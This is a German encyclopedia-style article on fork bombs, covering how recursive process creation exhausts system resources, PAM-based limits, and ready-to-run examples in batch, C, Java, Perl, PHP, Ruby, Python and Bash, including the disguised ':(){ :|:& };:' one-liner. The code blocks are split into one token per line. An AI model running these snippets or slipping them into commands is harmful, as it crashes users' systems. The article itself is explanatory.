# Forkbomb

Rekursive Prozesserzeugung

Eine Forkbomb (englisch Fork bomb), auch Rabbit genannt, ist ein Computerprogramm, dessen einziger Zweck es ist, rekursiv Kopien seiner selbst zu starten, alle verfügbaren Systemressourcen zu verbrauchen und so das System zu blockieren. Unter Unix geschieht das im einfachsten Fall mit dem Aufruf des Systemcalls fork in einer Endlosschleife.
In Pseudocode sieht eine Forkbomb etwa so aus:
```
ProgrammX {
  Rufe ProgrammX auf;
  Rufe ProgrammX auf;
  Warte bis ProgrammX beendet wurde;
}
```

Das Programm ruft zwei Kopien seiner selbst auf und wartet, bis sie wieder beendet wurden. Dieser Zustand wird jedoch niemals erreicht werden, da die Kopien genauso verfahren. Aus einem Programmaufruf werden somit zunächst 2, dann 4, dann 8 und nach nur 10 solcher Zyklen sind bereits über tausend Kopien gestartet und aktiv. Allgemein lässt sich festhalten, dass nach n Zyklen 2n Prozesse erzeugt worden sind, ihre Anzahl also exponentiell zunimmt. Diese verbrauchen, selbst wenn sie keinen komplizierten Code enthalten, CPU-Zeit und Speicher zur Verwaltung durch das Betriebssystem. Ein normaler Betrieb beziehungsweise normales Arbeiten ist bereits wenige Sekunden nach Aufruf der Forkbomb nicht mehr möglich.
Der konkrete Effekt einer Forkbomb hängt in erster Linie von der Konfiguration des Betriebssystems ab. Beispielsweise erlaubt PAM auf Unix- und Unix-ähnlichen Betriebssystemen die Zahl der Prozesse und den maximal zu verbrauchenden Speicher pro Benutzer zu beschränken. „Explodiert“ eine Forkbomb auf einem System, welches diese Möglichkeiten der Beschränkung nutzt, scheitert irgendwann der Versuch, neue Kopien der Forkbomb zu starten und das Wachstum ist eingedämmt.

## Beispiele für Forkbombs
Um die Stabilität des Systems nicht zu gefährden, wird empfohlen, die nachstehend genannten Beispiele nicht auszuführen.

### Microsoft-Windows-Batch-Datei
Beispiel für eine Microsoft-Windows-Batch-Datei in Kurzform:
```
%0
|
%0

```

oder
```
 
@
echo
 off
 
:
start

 
start
 
"Forkbomb"
 /high 
%0

 
goto
 
start

```

### Programmiersprache C
Beispiel für C unter Unix:
```
#include
 
<unistd.h>

int
 
main
(
void
){

    
for
(;;)

        
fork
();

    
return
 
0
;

}

```

Beispiel für C unter Windows
```
#include
 
<windows.h>

int
 
main
(
int
 
argc
,
 
char
 
**
argv
)
 
{

  
STARTUPINFO
 
si
;

  
PROCESS_INFORMATION
 
pi
;

  
ZeroMemory
(
&
si
,
 
sizeof
(
si
));

  
si
.
cb
 
=
 
sizeof
(
si
);

  
while
 
(
1
)
 
{

	  
SetConsoleCtrlHandler
(
0
,
 
1
);

	  
CreateProcess
(
*
argv
,
 
0
,
 
0
,
 
0
,
 
0
,
 
CREATE_NEW_CONSOLE
,
 
0
,
 
0
,
 
&
si
,
 
&
pi
);

  
}

  
return
 
0
;

}

```

### Java
Beispiel für Java:
```
public
 
class
 
ForkBomb
 
implements
 
Runnable
 
{

  
public
 
static
 
void
 
main
(
String
[]
 
args
)
 
{

    
new
 
ForkBomb
().
run
();

  
}

  
public
 
void
 
run
()
 
{

    
new
 
Thread
(
this
).
start
();

    
this
.
run
();

  
}

}

```

### Perl
Beispiel für Perl als Kommandozeilenaufruf:
```
perl
 
-
e
 
"fork while fork"

```

### PHP
Beispiel für PHP:
```
<?php

while
(
true
)
 
pcntl_fork
();

?>

```

### Ruby
Beispiel für Ruby:
```
loop
 
{
 
fork
 
}

```

### Python
Beispiel für Python als Programm:
```
import
 
os

while
 
True
:

     
os
.
fork
()

```

oder als Kommandozeilenaufruf:
```
python
 
-c
 
'while 1: __import__("os").fork()'

```

### Bash
Beispiel für Bash in Normalform:
```
function
 
f
()
 
{

    
f
 
|
 
f
&

}

f

```

Um die Eigenschaft als Forkbomb zu verschleiern, wird obiger Code häufig in folgender Kurzform gegeben:
```
:
(){
 
:
|
:
&
 
}
;
:

```

Erklärung:
```
:
()
      
# Definition der Funktion ":" -- immer wenn ":" aufgerufen wird, tue das folgende:

{
        
#

    
:
    
# eine neue Kopie von ":" laden

    
|
    
# … und seine Standardausgabe umleiten auf …

    
:
    
# … eine weitere Kopie von ":" (die auch in den Speicher geladen werden muss)

         
# (":|:" erzeugt also einfach 2 Kopien von ":", immer wenn es aufgerufen wird)

    
&
    
# die Befehlszeile unabhängig vom aufrufenden Prozess machen (im Hintergrund ausführen)

}
        
#

;
        
# Durch ";" wird die Definition von ":" beendet

:
        
# …und durch den Aufruf von ":" die Kettenreaktion in Gang gesetzt.

```